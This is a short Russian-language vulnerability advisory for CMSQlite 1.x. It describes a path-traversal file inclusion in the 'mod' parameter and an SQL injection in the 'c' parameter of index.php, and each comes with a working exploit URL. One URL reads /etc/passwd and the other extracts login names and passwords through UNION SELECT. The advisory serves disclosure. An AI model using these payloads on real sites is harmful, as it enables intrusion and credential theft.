Программа: CMSQlite 1.x
Уязвимость позволяет удаленному пользователю произвольные SQL команды в базе
данных приложения и выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "mod" сценарием index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://cmsqlite.audit/index.php?c=x&mod=../../../../../../../../../etc/passwd%00x
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "c" сценарием index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
http://cmsqlite.audit/index.php?c=2-2%20UNION%20ALL%20SELECT%202,
name%20||%20password,%203,4,5,6%20FROM%20login%20limit%201%20--%20x
